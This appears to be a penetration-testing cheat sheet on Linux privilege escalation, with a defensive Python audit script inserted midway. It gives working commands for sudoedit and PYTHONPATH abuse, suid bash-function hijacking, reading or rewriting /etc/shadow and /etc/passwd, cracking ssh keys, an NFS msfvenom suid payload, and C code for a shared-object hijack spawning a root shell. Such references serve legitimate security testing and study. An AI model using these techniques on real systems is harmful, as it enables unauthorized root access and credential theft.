Linux

A list of Privilege Escalation Techniques for Linux.

Local Privesc Scanner

linPEAS

LinPEAS is a script that searches for possible paths to escalate privileges on Linux/Unix/MacOS hosts.

Github: https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS

Known vulnerabilities

Sudo version <= 1.9.12p1

Allows a user who has sudo privileges for sudoedit to read/write all files of another user.

pezzz@flop.py:~$ EDITOR="vi -- </path/file>" sudo -u <user> sudoedit <file>

Polkit vulnerability

Kernel exploits

bash < 4.2-048:

How to exploit:

  • Find a suid binary and check with strings which Linux binary it calls

  • Create a function with the same name: function <path_to_used_binary> { /bin/bash -p; }

  • Export it: export -f /usr/sbin/service

  • Run the suid binary

Commands runnable with sudo: sudo -l

  • If commands are runnable with NOPASSWD then check [GTFOBins](https://gtfobins.github.io/)

  • If commands are runnable with SETENV, you can use this to set an environment variable such as PYTHONPATH like this: sudo -u <user> PYTHONPATH=<your/python/path> <command>. This will force the program to execute the scripts in the given path with the rights of the sudo user. Don't forget you can always create files in /tmp.

    • Abuse wildcard commands

Users' commands history

cat ~/.*history | less

You might find passwords in the history.

Binaries with the suid bit set

find / -perm -4000 2>/dev/null

Check if the binaries are exploitable for privesc on [GTFOBins](https://gtfobins.github.io/).

Cron jobs

  • Abuse wildcard commands

  • Abuse environment variables

Writable /etc/shadow

Generate a new hash with mkpasswd -m sha-512 <new_password> and replace that of a user, or create a new user.

Writable /etc/passwd

Generate a new password hash with openssl passwd newpasswordhere and then replace the x of a user, or create a new one.

Readable /etc/shadow

Read the users' password hashes and try to crack them.

Readable ssh keys (use it to connect as the user)

If the ssh key is password protected, you can use ssh2john.py id_rsa > tojohn.txt to convert it into a hash and then crack the password with john tojohn.txt

Writable authorized_keys file: add your id_rsa.pub key to it and then connect as the user.

Secrets in config files

Abuse NFS configuration:

Check: cat /etc/exports

How to exploit:

  • Mount the NFS share on your machine: sudo mkdir /tmp/nfs; sudo mount -o rw,vers=3 10.10.10.10:/tmp /tmp/nfs

  • Generate the payload: msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf

  • Add the suid bit and execution rights: chmod +xs /tmp/nfs/shell.elf

  • Execute the payload on the target machine: /tmp/shell.elf
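The sudo, /etc/shadow, /etc/passwd and NFS entries above all come down to a handful of configuration checks. As an added audit helper (not part of the original cheat sheet or any tool it mentions), the script below flags NOPASSWD/SETENV sudo rules, no_root_squash exports and loose permissions on the credential files; the sample inputs are constructed, and on a real host you would feed it `sudo -l` output, /etc/exports and `os.stat(path).st_mode`.

```python
import re
import stat

# Constructed sample of rule lines as printed by `sudo -l` (not a real host).
SAMPLE_SUDO_RULES = """\
(ALL) NOPASSWD: /usr/bin/vim
(root) SETENV: /usr/bin/python3
(ALL) /usr/bin/apt
"""

# Constructed sample /etc/exports (not a real host); the commented line must be ignored.
SAMPLE_EXPORTS = """\
/srv/share 10.0.0.0/24(rw,sync,no_root_squash)
/srv/public *(ro,sync,root_squash)
# /old 10.0.0.0/24(rw,no_root_squash)
"""


def risky_sudo_rules(rules_text):
    """Return (tag, rule) pairs for rules carrying NOPASSWD (no authentication)
    or SETENV (caller may inject variables such as PYTHONPATH)."""
    findings = []
    for line in rules_text.splitlines():
        for tag in re.findall(r"\b(NOPASSWD|SETENV)\b", line):
            findings.append((tag, line.strip()))
    return findings


def risky_exports(exports_text):
    """Return export paths where any client entry sets no_root_squash
    (a remote root keeps uid 0 on the share, so suid files it drops are trusted)."""
    risky = []
    for line in exports_text.splitlines():
        line = line.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        path = line.split()[0]
        option_groups = re.findall(r"\(([^)]*)\)", line)
        if any("no_root_squash" in opts.split(",") for opts in option_groups):
            risky.append(path)
    return risky


def credential_file_problems(path, mode):
    """Report st_mode bits on /etc/passwd or /etc/shadow that enable the
    writable/readable cases above (group-readable shadow is normal on Debian)."""
    problems = []
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        problems.append(f"{path} is writable by group/other")
    if path.endswith("shadow") and mode & stat.S_IROTH:
        problems.append(f"{path} is readable by other")
    return problems
```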

Hijack shared objects (resource):

Requirements:

  • a suid binary or a binary callable with sudo

  • a way to make the binary call a shared object you wrote:

    • shared object does not exist => create it

    • shared object is writable => overwrite it

    • binary is callable with sudo and keeps the LD_LIBRARY_PATH variable => export the env variable when calling the binary

    • /etc/ld.so.conf.d contains a config file which points to somewhere you can write => put your exploit in the pointed path

How to check exploitability:

  • Check loaded shared objects and whether there are variables like RUNPATH: readelf -d ./binary

  • Check if the binary finds the shared objects: ldd binary

How to exploit:

  • write your exploit (you can replace the function name by a function used by the binary):

```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

/* _init runs when the shared object is loaded by the target binary */
void _init() {
    setreuid(geteuid(), geteuid());
    system("/bin/bash -p");
}
```

  • compile it: gcc -shared -fPIC -nostartfiles -o lib.so exploit.c

  • put it somewhere where the binary will load it

  • run the binary
